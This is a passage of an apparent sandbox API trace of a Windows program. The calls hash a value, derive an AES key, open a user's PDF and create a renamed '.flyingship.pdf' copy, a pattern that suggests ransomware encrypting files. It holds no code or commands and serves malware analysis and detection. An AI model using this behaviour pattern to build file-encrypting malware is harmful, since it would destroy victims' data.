lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.291] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.291] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.291] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0173.291] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.291] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.291] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.292] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.292] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.292] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.292] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0173.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.293] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0173.293] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0173.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.294] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.294] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.295] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.295] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.295] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.295] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0173.296] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.296] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.296] CryptDestroyHash (hHash=0x90ae18) returned 1 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0173.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.296] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.296] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.296] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.296] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xdf9hoa.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.297] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.297] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.298] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.298] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0173.298] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.299] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.flyingship.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xdf9hoa.flyingship.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0173.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.300] HeapFree (in: 